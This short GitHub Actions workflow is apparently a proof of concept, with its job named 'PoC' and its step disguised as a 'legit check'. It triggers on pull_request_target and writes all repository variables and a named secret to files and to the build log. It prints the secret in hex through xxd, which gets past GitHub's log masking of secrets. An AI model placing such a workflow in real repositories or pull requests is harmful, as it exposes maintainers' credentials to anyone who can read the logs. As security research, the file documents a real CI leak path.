on:
  pull_request_target:
   branches:
     - main
  push:
jobs:
  PoC:
    permissions:
      contents: read
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
      - name: legit check
        run: |
          echo "$ALLMYVARS" > vars.txt
          echo $ALLMYVARS
          echo $ALLMYSECRETS > secrets.txt
          xxd secrets.txt
        shell: bash
        env:
          ALLMYVARS: ${{ toJSON(vars) }}
          ALLMYSECRETS: ${{ secrets.test_secret }}
